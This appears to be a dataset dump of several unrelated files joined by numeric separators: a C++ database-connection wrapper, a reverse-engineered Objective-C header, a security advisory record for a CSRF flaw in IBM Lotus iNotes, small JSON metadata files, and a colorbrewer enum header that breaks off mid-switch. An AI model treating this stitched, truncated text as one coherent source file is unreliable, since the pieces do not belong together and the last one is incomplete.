Reference< XDatabaseMetaData > SAL_CALL OConnectionWeakWrapper::getMetaData( ) throw(SQLException, RuntimeException)
{
	::osl::MutexGuard aGuard( m_aMutex );
	checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
	return m_xConnection->getMetaData();
}
// --------------------------------------------------------------------------------
void SAL_CALL OConnectionWeakWrapper::setReadOnly( sal_Bool readOnly ) throw(SQLException, RuntimeException)
{
	::osl::MutexGuard aGuard( m_aMutex );
	checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
	m_xConnection->setReadOnly(readOnly);
}
// --------------------------------------------------------------------------------
sal_Bool SAL_CALL OConnectionWeakWrapper::isReadOnly( ) throw(SQLException, RuntimeException)
{
	::osl::MutexGuard aGuard( m_aMutex );
	checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
	return m_xConnection->isReadOnly();
}
// --------------------------------------------------------------------------------
void SAL_CALL OConnectionWeakWrapper::setCatalog( const ::rtl::OUString& catalog ) throw(SQLException, RuntimeException)
{
	::osl::MutexGuard aGuard( m_aMutex );
	checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
	m_xConnection->setCatalog(catalog);
}
// --------------------------------------------------------------------------------
::rtl::OUString SAL_CALL OConnectionWeakWrapper::getCatalog( ) throw(SQLException, RuntimeException)
{
	::osl::MutexGuard aGuard( m_aMutex );
	checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
	return m_xConnection->getCatalog();
}
// --------------------------------------------------------------------------------
void SAL_CALL OConnectionWeakWrapper::setTransactionIsolation( sal_Int32 level ) throw(SQLException, RuntimeException)
{
	::osl::MutexGuard aGuard( m_aMutex );
	checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
	m_xConnection->setTransactionIsolation(level);
}
// --------------------------------------------------------------------------------
sal_Int32 SAL_CALL OConnectionWeakWrapper::getTransactionIsolation( ) throw(SQLException, RuntimeException)
{
	::osl::MutexGuard aGuard( m_aMutex );
	checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
	return m_xConnection->getTransactionIsolation();
}
// --------------------------------------------------------------------------------
Reference< ::com::sun::star::container::XNameAccess > SAL_CALL OConnectionWeakWrapper::getTypeMap( ) throw(SQLException, RuntimeException)
{
	::osl::MutexGuard aGuard( m_aMutex );
	checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
	return m_xConnection->getTypeMap();
}
// --------------------------------------------------------------------------------
void SAL_CALL OConnectionWeakWrapper::setTypeMap( const Reference< ::com::sun::star::container::XNameAccess >& typeMap ) throw(SQLException, RuntimeException)
{
	::osl::MutexGuard aGuard( m_aMutex );
	checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
	m_xConnection->setTypeMap(typeMap);
}
// --------------------------------------------------------------------------------
// XCloseable
// Close the connection.  The guard lives only in the inner scope so the
// mutex is released *before* dispose() runs -- disposing() below re-acquires
// the same mutex and would otherwise self-deadlock.
void SAL_CALL OConnectionWeakWrapper::close( ) throw(SQLException, RuntimeException)
{
	{
		::osl::MutexGuard aGuard( m_aMutex );
		checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
	}
	dispose();
}
//------------------------------------------------------------------------------
// Tears down both bases: the disposable component helper and the
// wrapped-connection state kept by OConnectionWrapper.
void OConnectionWeakWrapper::disposing()
{
	::osl::MutexGuard aGuard(m_aMutex);
	OConnectionWeakWrapper_BASE::disposing();
	OConnectionWrapper::disposing();
}
// -----------------------------------------------------------------------------
// com::sun::star::lang::XUnoTunnel
// NOTE(review): the line above says XUnoTunnel but the macros below implement
// XInterface / XTypeProvider forwarding -- the comment looks stale; confirm.
// Debug builds use the convenience forwarding macro; release builds expand
// the ref-count macro and hand-write queryInterface so that the wrapper base
// (OConnectionWrapper) is consulted when the component base misses.
// Do NOT insert anything between the backslash-continued lines below: they
// form a single logical line.
#ifdef N_DEBUG
IMPLEMENT_FORWARD_XINTERFACE2(OConnectionWeakWrapper,OConnectionWeakWrapper_BASE,OConnectionWrapper)
#else
IMPLEMENT_FORWARD_REFCOUNT( OConnectionWeakWrapper, OConnectionWeakWrapper_BASE ) \
::com::sun::star::uno::Any SAL_CALL OConnectionWeakWrapper::queryInterface( const ::com::sun::star::uno::Type& _rType ) throw (::com::sun::star::uno::RuntimeException) \
{ \
	::com::sun::star::uno::Any aReturn = OConnectionWeakWrapper_BASE::queryInterface( _rType ); \
	if ( !aReturn.hasValue() ) \
		aReturn = OConnectionWrapper::queryInterface( _rType ); \
	return aReturn; \
}
#endif
IMPLEMENT_FORWARD_XTYPEPROVIDER2(OConnectionWeakWrapper,OConnectionWeakWrapper_BASE,OConnectionWrapper)
| 2,867 |
1,062 | <gh_stars>1000+
//
// Generated by class-dump 3.5b1 (64 bit) (Debug version compiled Dec 3 2019 19:59:57).
//
// Copyright (C) 1997-2019 <NAME>.
//
#import "InteractiveComposeContext.h"
@class NSRunningApplication;
// Reverse-engineered header (class-dump output) -- the IMP addresses are
// artifacts of the dump, not documentation.
// Apparently a compose context that transiently activates its application
// and remembers which app to restore focus to when the compose window
// closes (see restoreToApplication / controllerWillClose:) -- unverified.
@interface ActivatingComposeContext : InteractiveComposeContext
{
    NSRunningApplication *_restoreToApplication;	// 8 = 0x8
}
@property(readonly, nonatomic) NSRunningApplication *restoreToApplication; // @synthesize restoreToApplication=_restoreToApplication;
// - (void).cxx_destruct; // IMP=0x000000010018c31e
- (void)controllerWillClose:(id)arg1; // IMP=0x000000010018c2a0
- (void)loadCompleted:(id)arg1; // IMP=0x000000010018c202
- (BOOL)shouldTransientlyActivateApplication; // IMP=0x000000010018c1cd
- (id)_currentActiveApplication; // IMP=0x000000010018bfe9
- (id)initWithType:(long long)arg1 targetMessages:(id)arg2; // IMP=0x000000010018bf85
@end
| 318 |
892 | {
"schema_version": "1.2.0",
"id": "GHSA-5g96-p6qf-5h9j",
"modified": "2022-05-02T06:17:12Z",
"published": "2022-05-02T06:17:12Z",
"aliases": [
"CVE-2010-0921"
],
"details": "Cross-site request forgery (CSRF) vulnerability in IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.281 for Domino 8.0.2 FP4 allows remote attackers to hijack the authentication of unspecified victims via vectors related to lack of \"XSS/CSRF Get Filter and Referer Check fixes.\"",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2010-0921"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56556"
},
{
"type": "WEB",
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg27018109"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/38459"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2010/0496"
}
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"severity": "MODERATE",
"github_reviewed": false
}
} | 545 |
2,928 | /**
* This code was generated by [react-native-codegen](https://www.npmjs.com/package/react-native-codegen).
*
* Do not edit this file as changes may cause incorrect behavior and will be lost
* once the code is regenerated.
*
* @generated by codegen project: GeneratePropsJavaInterface.js
*/
package com.facebook.react.viewmanagers;
import android.view.View;
public interface RNGestureHandlerRootViewManagerInterface<T extends View> {
// No props
}
| 133 |
310 | <reponame>dreeves/usesthis
{
"name": "SAVE",
"description": "Static analysis software for developers.",
"url": "http://www.coverity.com/products/coverity-save/"
} | 59 |
5,169 | {
"name": "Titanium",
"version": "0.7",
"license": "None",
"summary": "Image viewer library",
"description": " A library that provides a way to view full screen images from thumbnail previews.\n",
"homepage": "https://github.com/Quri/Titanium",
"authors": {
"<NAME>": "<EMAIL>"
},
"platforms": {
"ios": "7.0"
},
"source": {
"git": "<EMAIL>:quri/Titanium.git",
"tag": "0.7"
},
"source_files": "Titanium/Titanium/*.{h,m}",
"requires_arc": true
}
| 219 |
349 | /*********************************************************************************
*
* Inviwo - Interactive Visualization Workshop
*
* Copyright (c) 2014-2021 Inviwo Foundation
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice, this
* list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
* ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
*********************************************************************************/
/*
This complete file is auto-generated with python script
tools/codegen/colorbrewer/colorbrewer.py
*/
#pragma once
#include <inviwo/core/common/inviwocoredefine.h>
#include <inviwo/core/util/glm.h>
#include <vector>
#include <ostream>
namespace inviwo {
namespace colorbrewer {
// clang-format off
enum class Colormap {
Accent_1, Accent_2, Accent_3, Accent_4, Accent_5, Accent_6, Accent_7, Accent_8,
Blues_3, Blues_4, Blues_5, Blues_6, Blues_7, Blues_8, Blues_9,
BrBG_3, BrBG_4, BrBG_5, BrBG_6, BrBG_7, BrBG_8, BrBG_9, BrBG_10, BrBG_11,
BuGn_3, BuGn_4, BuGn_5, BuGn_6, BuGn_7, BuGn_8, BuGn_9,
BuPu_3, BuPu_4, BuPu_5, BuPu_6, BuPu_7, BuPu_8, BuPu_9,
Dark2_3, Dark2_4, Dark2_5, Dark2_6, Dark2_7, Dark2_8,
GnBu_3, GnBu_4, GnBu_5, GnBu_6, GnBu_7, GnBu_8, GnBu_9,
Greens_3, Greens_4, Greens_5, Greens_6, Greens_7, Greens_8, Greens_9,
Greys_3, Greys_4, Greys_5, Greys_6, Greys_7, Greys_8, Greys_9,
OrRd_3, OrRd_4, OrRd_5, OrRd_6, OrRd_7, OrRd_8, OrRd_9,
Oranges_3, Oranges_4, Oranges_5, Oranges_6, Oranges_7, Oranges_8, Oranges_9,
PRGn_3, PRGn_4, PRGn_5, PRGn_6, PRGn_7, PRGn_8, PRGn_9, PRGn_10, PRGn_11,
Paired_1, Paired_2, Paired_3, Paired_4, Paired_5, Paired_6, Paired_7, Paired_8, Paired_9, Paired_10, Paired_11, Paired_12,
Pastel1_3, Pastel1_4, Pastel1_5, Pastel1_6, Pastel1_7, Pastel1_8, Pastel1_9,
Pastel2_3, Pastel2_4, Pastel2_5, Pastel2_6, Pastel2_7, Pastel2_8,
PiYG_3, PiYG_4, PiYG_5, PiYG_6, PiYG_7, PiYG_8, PiYG_9, PiYG_10, PiYG_11,
PuBu_3, PuBu_4, PuBu_5, PuBu_6, PuBu_7, PuBu_8, PuBu_9,
PuBuGn_3, PuBuGn_4, PuBuGn_5, PuBuGn_6, PuBuGn_7, PuBuGn_8, PuBuGn_9,
PuOr_3, PuOr_4, PuOr_5, PuOr_6, PuOr_7, PuOr_8, PuOr_9, PuOr_10, PuOr_11,
PuRd_3, PuRd_4, PuRd_5, PuRd_6, PuRd_7, PuRd_8, PuRd_9,
Purples_3, Purples_4, Purples_5, Purples_6, Purples_7, Purples_8, Purples_9,
RdBu_3, RdBu_4, RdBu_5, RdBu_6, RdBu_7, RdBu_8, RdBu_9, RdBu_10, RdBu_11,
RdGy_3, RdGy_4, RdGy_5, RdGy_6, RdGy_7, RdGy_8, RdGy_9, RdGy_10, RdGy_11,
RdPu_3, RdPu_4, RdPu_5, RdPu_6, RdPu_7, RdPu_8, RdPu_9,
RdYlBu_3, RdYlBu_4, RdYlBu_5, RdYlBu_6, RdYlBu_7, RdYlBu_8, RdYlBu_9, RdYlBu_10, RdYlBu_11,
RdYlGn_3, RdYlGn_4, RdYlGn_5, RdYlGn_6, RdYlGn_7, RdYlGn_8, RdYlGn_9, RdYlGn_10, RdYlGn_11,
Reds_3, Reds_4, Reds_5, Reds_6, Reds_7, Reds_8, Reds_9,
Set1_1, Set1_2, Set1_3, Set1_4, Set1_5, Set1_6, Set1_7, Set1_8, Set1_9,
Set2_1, Set2_2, Set2_3, Set2_4, Set2_5, Set2_6, Set2_7, Set2_8,
Set3_3, Set3_4, Set3_5, Set3_6, Set3_7, Set3_8, Set3_9, Set3_10, Set3_11, Set3_12,
Spectral_3, Spectral_4, Spectral_5, Spectral_6, Spectral_7, Spectral_8, Spectral_9, Spectral_10, Spectral_11,
YlGn_3, YlGn_4, YlGn_5, YlGn_6, YlGn_7, YlGn_8, YlGn_9,
YlGnBu_3, YlGnBu_4, YlGnBu_5, YlGnBu_6, YlGnBu_7, YlGnBu_8, YlGnBu_9,
YlOrBr_3, YlOrBr_4, YlOrBr_5, YlOrBr_6, YlOrBr_7, YlOrBr_8, YlOrBr_9,
YlOrRd_3, YlOrRd_4, YlOrRd_5, YlOrRd_6, YlOrRd_7, YlOrRd_8,
FirstMap=Accent_1, LastMap=YlOrRd_8
};
enum class Category { Diverging, Qualitative, Sequential, NumberOfColormapCategories, Undefined };
enum class Family {
Accent, Blues, BrBG, BuGn, BuPu, Dark2, GnBu,
Greens, Greys, OrRd, Oranges, PRGn, Paired, Pastel1,
Pastel2, PiYG, PuBu, PuBuGn, PuOr, PuRd, Purples,
RdBu, RdGy, RdPu, RdYlBu, RdYlGn, Reds, Set1,
Set2, Set3, Spectral, YlGn, YlGnBu, YlOrBr, YlOrRd,
NumberOfColormapFamilies, Undefined
};
// clang-format on
template <class Elem, class Traits>
std::basic_ostream<Elem, Traits>& operator<<(std::basic_ostream<Elem, Traits>& os,
Colormap colormap) {
switch (colormap) {
// clang-format off
case Colormap::Accent_1: os << "Accent_1"; break;
case Colormap::Accent_2: os << "Accent_2"; break;
case Colormap::Accent_3: os << "Accent_3"; break;
case Colormap::Accent_4: os << "Accent_4"; break;
case Colormap::Accent_5: os << "Accent_5"; break;
case Colormap::Accent_6: os << "Accent_6"; break;
case Colormap::Accent_7: os << "Accent_7"; break;
case Colormap::Accent_8: os << "Accent_8"; break;
case Colormap::Blues_3: os << "Blues_3"; break;
case Colormap::Blues_4: os << "Blues_4"; break;
case Colormap::Blues_5: os << "Blues_5"; break;
case Colormap::Blues_6: os << "Blues_6"; break;
case Colormap::Blues_7: os << "Blues_7"; break;
case Colormap::Blues_8: os << "Blues_8"; break;
case Colormap::Blues_9: os << "Blues_9"; break;
case Colormap::BrBG_3: os << "BrBG_3"; break;
case Colormap::BrBG_4: os << "BrBG_4"; break;
case Colormap::BrBG_5: os << "BrBG_5"; break;
case Colormap::BrBG_6: os << "BrBG_6"; break;
case Colormap::BrBG_7: os << "BrBG_7"; break;
case Colormap::BrBG_8: os << "BrBG_8"; break;
case Colormap::BrBG_9: os << "BrBG_9"; break;
case Colormap::BrBG_10: os << "BrBG_10"; break;
case Colormap::BrBG_11: os << "BrBG_11"; break;
case Colormap::BuGn_3: os << "BuGn_3"; break;
case Colormap::BuGn_4: os << "BuGn_4"; break;
case Colormap::BuGn_5: os << "BuGn_5"; break;
case Colormap::BuGn_6: os << "BuGn_6"; break;
case Colormap::BuGn_7: os << "BuGn_7"; break;
case Colormap::BuGn_8: os << "BuGn_8"; break;
case Colormap::BuGn_9: os << "BuGn_9"; break;
case Colormap::BuPu_3: os << "BuPu_3"; break;
case Colormap::BuPu_4: os << "BuPu_4"; break;
case Colormap::BuPu_5: os << "BuPu_5"; break;
case Colormap::BuPu_6: os << "BuPu_6"; break;
case Colormap::BuPu_7: os << "BuPu_7"; break;
case Colormap::BuPu_8: os << "BuPu_8"; break;
case Colormap::BuPu_9: os << "BuPu_9"; break;
case Colormap::Dark2_3: os << "Dark2_3"; break;
case Colormap::Dark2_4: os << "Dark2_4"; break;
case Colormap::Dark2_5: os << "Dark2_5"; break;
case Colormap::Dark2_6: os << "Dark2_6"; break;
case Colormap::Dark2_7: os << "Dark2_7"; break;
case Colormap::Dark2_8: os << "Dark2_8"; break;
case Colormap::GnBu_3: os << "GnBu_3"; break;
case Colormap::GnBu_4: os << "GnBu_4"; break;
case Colormap::GnBu_5: os << "GnBu_5"; break;
case Colormap::GnBu_6: os << "GnBu_6"; break;
case Colormap::GnBu_7: os << "GnBu_7"; break;
case Colormap::GnBu_8: os << "GnBu_8"; break;
case Colormap::GnBu_9: os << "GnBu_9"; break;
case Colormap::Greens_3: os << "Greens_3"; break;
case Colormap::Greens_4: os << "Greens_4"; break;
case Colormap::Greens_5: os << "Greens_5"; break;
case Colormap::Greens_6: os << "Greens_6"; break;
case Colormap::Greens_7: os << "Greens_7"; break;
case Colormap::Greens_8: os << "Greens_8"; break;
case Colormap::Greens_9: os << "Greens_9"; break;
case Colormap::Greys_3: os << "Greys_3"; break;
case Colormap::Greys_4: os << "Greys_4"; break;
case Colormap::Greys_5: os << "Greys_5"; break;
case Colormap::Greys_6: os << "Greys_6"; break;
case Colormap::Greys_7: os << "Greys_7"; break;
case Colormap::Greys_8: os << "Greys_8"; break;
case Colormap::Greys_9: os << "Greys_9"; break;
case Colormap::OrRd_3: os << "OrRd_3"; break;
case Colormap::OrRd_4: os << "OrRd_4"; break;
case Colormap::OrRd_5: os << "OrRd_5"; break;
case Colormap::OrRd_6: os << "OrRd_6"; break;
case Colormap::OrRd_7: os << "OrRd_7"; break;
case Colormap::OrRd_8: os << "OrRd_8"; break;
case Colormap::OrRd_9: os << "OrRd_9"; break;
case Colormap::Oranges_3: os << "Oranges_3"; break;
case Colormap::Oranges_4: os << "Oranges_4"; break;
case Colormap::Oranges_5: os << "Oranges_5"; break;
case Colormap::Oranges_6: os << "Oranges_6"; break;
case Colormap::Oranges_7: os << "Oranges_7"; break;
case Colormap::Oranges_8: os << "Oranges_8"; break;
case Colormap::Oranges_9: os << "Oranges_9"; break;
case Colormap::PRGn_3: os << "PRGn_3"; break;
case Colormap::PRGn_4: os << "PRGn_4"; break;
case Colormap::PRGn_5: os << "PRGn_5"; break;
case Colormap::PRGn_6: os << "PRGn_6"; break;
case Colormap::PRGn_7: os << "PRGn_7"; break;
case Colormap::PRGn_8: os << "PRGn_8"; break;
case Colormap::PRGn_9: os << "PRGn_9"; break;
case Colormap::PRGn_10: os << "PRGn_10"; break;
case Colormap::PRGn_11: os << "PRGn_11"; break;
case Colormap::Paired_1: os << "Paired_1"; break;
case Colormap::Paired_2: os << "Paired_2"; break;
case Colormap::Paired_3: os << "Paired_3"; break;
case Colormap::Paired_4: os << "Paired_4"; break;
case Colormap::Paired_5: os << "Paired_5"; break;
case Colormap::Paired_6: os << "Paired_6"; break;
case Colormap::Paired_7: os << "Paired_7"; break;
case Colormap::Paired_8: os << "Paired_8"; break;
case Colormap::Paired_9: os << "Paired_9"; break;
case Colormap::Paired_10: os << "Paired_10"; break;
case Colormap::Paired_11: os << "Paired_11"; break;
case Colormap::Paired_12: os << "Paired_12"; break;
case Colormap::Pastel1_3: os << "Pastel1_3"; break;
case Colormap::Pastel1_4: os << "Pastel1_4"; break;
case Colormap::Pastel1_5: os << "Pastel1_5"; break;
case Colormap::Pastel1_6: os << "Pastel1_6"; break;
case Colormap::Pastel1_7: os << "Pastel1_7"; break;
case Colormap::Pastel1_8: os << "Pastel1_8"; break;
case Colormap::Pastel1_9: os << "Pastel1_9"; break;
case Colormap::Pastel2_3: os << "Pastel2_3"; break;
case Colormap::Pastel2_4: os << "Pastel2_4"; break;
case Colormap::Pastel2_5: os << "Pastel2_5"; break;
case Colormap::Pastel2_6: os << "Pastel2_6"; break;
case Colormap::Pastel2_7: os << "Pastel2_7"; break;
case Colormap::Pastel2_8: os << "Pastel2_8"; break;
case Colormap::PiYG_3: os << "PiYG_3"; break;
case Colormap::PiYG_4: os << "PiYG_4"; break;
case Colormap::PiYG_5: os << "PiYG_5"; break;
case Colormap::PiYG_6: os << "PiYG_6"; break;
case Colormap::PiYG_7: os << "PiYG_7"; break;
case Colormap::PiYG_8: os << "PiYG_8"; break;
case Colormap::PiYG_9: os << "PiYG_9"; break;
case Colormap::PiYG_10: os << "PiYG_10"; break;
case Colormap::PiYG_11: os << "PiYG_11"; break;
case Colormap::PuBu_3: os << "PuBu_3"; break;
case Colormap::PuBu_4: os << "PuBu_4"; break;
case Colormap::PuBu_5: os << "PuBu_5"; break;
case Colormap::PuBu_6: os << "PuBu_6"; break;
case Colormap::PuBu_7: os << "PuBu_7"; break;
case Colormap::PuBu_8: os << "PuBu_8"; break;
case Colormap::PuBu_9: os << "PuBu_9"; break;
case Colormap::PuBuGn_3: os << "PuBuGn_3"; break;
case Colormap::PuBuGn_4: os << "PuBuGn_4"; break;
case Colormap::PuBuGn_5: os << "PuBuGn_5"; break;
case Colormap::PuBuGn_6: os << "PuBuGn_6"; break;
case Colormap::PuBuGn_7: os << "PuBuGn_7"; break;
case Colormap::PuBuGn_8: os << "PuBuGn_8"; break;
case Colormap::PuBuGn_9: os << "PuBuGn_9"; break;
case Colormap::PuOr_3: os << "PuOr_3"; break;
case Colormap::PuOr_4: os << "PuOr_4"; break;
case Colormap::PuOr_5: os << "PuOr_5"; break;
case Colormap::PuOr_6: os << "PuOr_6"; break;
case Colormap::PuOr_7: os << "PuOr_7"; break;
case Colormap::PuOr_8: os << "PuOr_8"; break;
case Colormap::PuOr_9: os << "PuOr_9"; break;
case Colormap::PuOr_10: os << "PuOr_10"; break;
case Colormap::PuOr_11: os << "PuOr_11"; break;
case Colormap::PuRd_3: os << "PuRd_3"; break;
case Colormap::PuRd_4: os << "PuRd_4"; break;
case Colormap::PuRd_5: os << "PuRd_5"; break;
case Colormap::PuRd_6: os << "PuRd_6"; break;
case Colormap::PuRd_7: os << "PuRd_7"; break;
case Colormap::PuRd_8: os << "PuRd_8"; break;
case Colormap::PuRd_9: os << "PuRd_9"; break;
case Colormap::Purples_3: os << "Purples_3"; break;
case Colormap::Purples_4: os << "Purples_4"; break;
case Colormap::Purples_5: os << "Purples_5"; break;
case Colormap::Purples_6: os << "Purples_6"; break;
case Colormap::Purples_7: os << "Purples_7"; break;
case Colormap::Purples_8: os << "Purples_8"; break;
case Colormap::Purples_9: os << "Purples_9"; break;
case Colormap::RdBu_3: os << "RdBu_3"; break;
case Colormap::RdBu_4: os << "RdBu_4"; break;
case Colormap::RdBu_5: os << "RdBu_5"; break;
case Colormap::RdBu_6: os << "RdBu_6"; break;
case Colormap::RdBu_7: os << "RdBu_7"; break;
case Colormap::RdBu_8: os << "RdBu_8"; break;
case Colormap::RdBu_9: os << "RdBu_9"; break;
case Colormap::RdBu_10: os << "RdBu_10"; break;
case Colormap::RdBu_11: os << "RdBu_11"; break;
case Colormap::RdGy_3: os << "RdGy_3"; break;
case Colormap::RdGy_4: os << "RdGy_4"; break;
case Colormap::RdGy_5: os << "RdGy_5"; break;
case Colormap::RdGy_6: os << "RdGy_6"; break;
case Colormap::RdGy_7: os << "RdGy_7"; break;
case Colormap::RdGy_8: os << "RdGy_8"; break;
case Colormap::RdGy_9: os << "RdGy_9"; break;
case Colormap::RdGy_10: os << "RdGy_10"; break;
case Colormap::RdGy_11: os << "RdGy_11"; break;
case Colormap::RdPu_3: os << "RdPu_3"; break;
case Colormap::RdPu_4: os << "RdPu_4"; break;
case Colormap::RdPu_5: os << "RdPu_5"; break;
case Colormap::RdPu_6: os << "RdPu_6"; break;
case Colormap::RdPu_7: os << "RdPu_7"; break;
case Colormap::RdPu_8: os << "RdPu_8"; break;
case Colormap::RdPu_9: os << "RdPu_9"; break;
case Colormap::RdYlBu_3: os << "RdYlBu_3"; break;
case Colormap::RdYlBu_4: os << "RdYlBu_4"; break;
case Colormap::RdYlBu_5: os << "RdYlBu_5"; break;
case Colormap::RdYlBu_6: os << "RdYlBu_6"; break;
case Colormap::RdYlBu_7: os << "RdYlBu_7"; break;
case Colormap::RdYlBu_8: os << "RdYlBu_8"; break;
case Colormap::RdYlBu_9: os << "RdYlBu_9"; break;
case Colormap::RdYlBu_10: os << "RdYlBu_10"; break;
case Colormap::RdYlBu_11: os << "RdYlBu_11"; break;
case Colormap::RdYlGn_3: os << "RdYlGn_3"; break;
case Colormap::RdYlGn_4: os << "RdYlGn_4"; break;
case Colormap::RdYlGn_5: os << "RdYlGn_5"; break;
case Colormap::RdYlGn_6: os << "RdYlGn_6"; break;
case Colormap::RdYlGn_7: os << "RdYlGn_7"; break;
case Colormap::RdYlGn_8: os << "RdYlGn_8"; break;
case Colormap::RdYlGn_9: os << "RdYlGn_9"; break;
case Colormap::RdYlGn_10: os << "RdYlGn_10"; break;
case Colormap::RdYlGn_11: os << "RdYlGn_11"; break;
case Colormap::Reds_3: os << "Reds_3"; break;
case Colormap::Reds_4: os << "Reds_4"; break;
case Colormap::Reds_5: os << "Reds_5"; break;
case Colormap::Reds_6: os << "Reds_6"; break;
case Colormap::Reds_7: os << "Reds_7"; break;
case Colormap::Reds_8: os << "Reds_8"; break;
case Colormap::Reds_9: os << "Reds_9"; break;
case Colormap::Set1_1: os << "Set1_1"; break;
case Colormap::Set1_2: os << "Set1_2"; break;
case Colormap::Set1_3: os << "Set1_3"; break;
case Colormap::Set1_4: os << "Set1_4"; break;
case Colormap::Set1_5: os << "Set1_5"; break;
case Colormap::Set1_6: os << "Set1_6"; break;
case Colormap::Set1_7: os << "Set1_7"; break;
case Colormap::Set1_8: os << "Set1_8"; break;
case Colormap::Set1_9: os << "Set1_9"; break;
case Colormap::Set2_1: os << "Set2_1"; break;
case Colormap::Set2_2: os << "Set2_2"; break;
case Colormap::Set2_3: os << "Set2_3"; break;
case Colormap::Set2_4: os << "Set2_4"; break;
case Colormap::Set2_5: os << "Set2_5"; break;
case Colormap::Set2_6: os << "Set2_6"; break;
case Colormap::Set2_7: os << "Set2_7"; break;
case Colormap::Set2_8: os << "Set2_8"; break;
case Colormap::Set3_3: os << "Set3_3"; break;
case Colormap::Set3_4: os << "Set3_4"; break;
case Colormap::Set3_5: os << "Set3_5"; break;
case Colormap::Set3_6: os << "Set3_6"; break;
case Colormap::Set3_7: os << "Set3_7"; break;
case Colormap::Set3_8: os << "Set3_8"; break;
case Colormap::Set3_9: os << "Set3_9"; break;
case Colormap::Set3_10: os << "Set3_10"; break;
case Colormap::Set3_11: os << "Set3_11"; break;
case Colormap::Set3_12: os << "Set3_12"; break;
case Colormap::Spectral_3: os << "Spectral_3"; break;
case Colormap::Spectral_4: os << "Spectral_4"; break;
case Colormap::Spectral_5: os << "Spectral_5"; break;
case Colormap::Spectral_6: os << "Spectral_6"; break;
case Colormap::Spectral_7: os << "Spectral_7"; break;
case Colormap::Spectral_8: os << "Spectral_8"; break;
case Colormap::Spectral_9: os << "Spectral_9"; break;
case Colormap::Spectral_10: os << "Spectral_10"; break;
case Colormap::Spectral_11: os << "Spectral_11"; break;
case Colormap::YlGn_3: os << "YlGn_3"; break;
case Colormap::YlGn_4: os << "YlGn_4"; break;
case Colormap::YlGn_5: os << "YlGn_5"; break;
case Colormap::YlGn_6: os << "YlGn_6"; break;
case Colormap::YlGn_7: os << "YlGn_7"; break;
case Colormap::YlGn_8: os << "YlGn_8"; break;
case Colormap::YlGn_9: os << "YlGn_9"; break;
case Colormap::YlGnBu_3: os << "YlGnBu_3"; break;
case Colormap::YlGnBu_4: os << "YlGnBu_4"; break;
case Colormap::YlGnBu_5: os << "YlGnBu_5"; break;
case Colormap::YlGnBu_6: os << "YlGnBu_6"; break;
case Colormap::YlGnBu_7: os << "YlGnBu_7"; break;
case Colormap::YlGnBu_8: os << "YlGnBu_8"; break;
case Colormap::YlGnBu_9: os << "YlGnBu_9"; break;
case Colormap::YlOrBr_3: os << "YlOrBr_3"; break;
case Colormap::YlOrBr_4: os << "YlOrBr_4"; break;
case Colormap::YlOrBr_5: os << "YlOrBr_5"; break;
case Colormap::YlOrBr_6: os << "YlOrBr_6"; break;
case Colormap::YlOrBr_7: os << "YlOrBr_7"; break;
case Colormap::YlOrBr_8: os << "YlOrBr_8"; break;
case Colormap::YlOrBr_9: os << "YlOrBr_9"; break;
case Colormap::YlOrRd_3: os << "YlOrRd_3"; break;
case Colormap::YlOrRd_4: os << "YlOrRd_4"; break;
case Colormap::YlOrRd_5: os << "YlOrRd_5"; break;
case Colormap::YlOrRd_6: os << "YlOrRd_6"; break;
case Colormap::YlOrRd_7: os << "YlOrRd_7"; break;
case Colormap::YlOrRd_8: os << "YlOrRd_8"; break;
// clang-format on
}
return os;
}
template <class Elem, class Traits>
std::basic_ostream<Elem, Traits>& operator<<(std::basic_ostream<Elem, Traits>& os,
Category category) {
switch (category) {
// clang-format off
case Category::Diverging: os << "Diverging"; break;
case Category::Qualitative: os << "Qualitative"; break;
case Category::Sequential: os << "Sequential"; break;
case Category::NumberOfColormapCategories: os << "NumberOfColormapCategories"; break;
case Category::Undefined: os << "Undefined"; break;
// clang-format on
}
return os;
}
template <class Elem, class Traits>
std::basic_ostream<Elem, Traits>& operator<<(std::basic_ostream<Elem, Traits>& os, Family family) {
switch (family) {
// clang-format off
case Family::Accent: os << "Accent"; break;
case Family::Blues: os << "Blues"; break;
case Family::BrBG: os << "BrBG"; break;
case Family::BuGn: os << "BuGn"; break;
